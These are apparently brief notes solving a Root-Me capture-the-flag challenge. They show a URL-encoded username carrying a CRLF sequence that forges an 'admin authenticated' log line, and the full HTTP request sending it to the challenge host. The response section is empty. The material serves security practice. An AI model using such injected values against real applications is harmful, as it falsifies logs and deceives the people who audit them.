Username 
%61%64%6d%69%6e%20%61%75%74%68%65%6e%74%69%63%61%74%65%64%2e%0d%0aadmin
REquest 
GET /web-serveur/ch14/?username=%61%64%6d%69%6e%20%61%75%74%68%65%6e%74%69%63%61%74%65%64%2e%0d%0aadmin&password=admin HTTP/1.1
Host: challenge01.root-me.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://challenge01.root-me.org/web-serveur/ch14/?username=admin&password=admin
Cookie: PHPSESSID=1spl0icp6sd80inpoke4ndobs2
Connection: close
Upgrade-Insecure-Requests: 1

Response
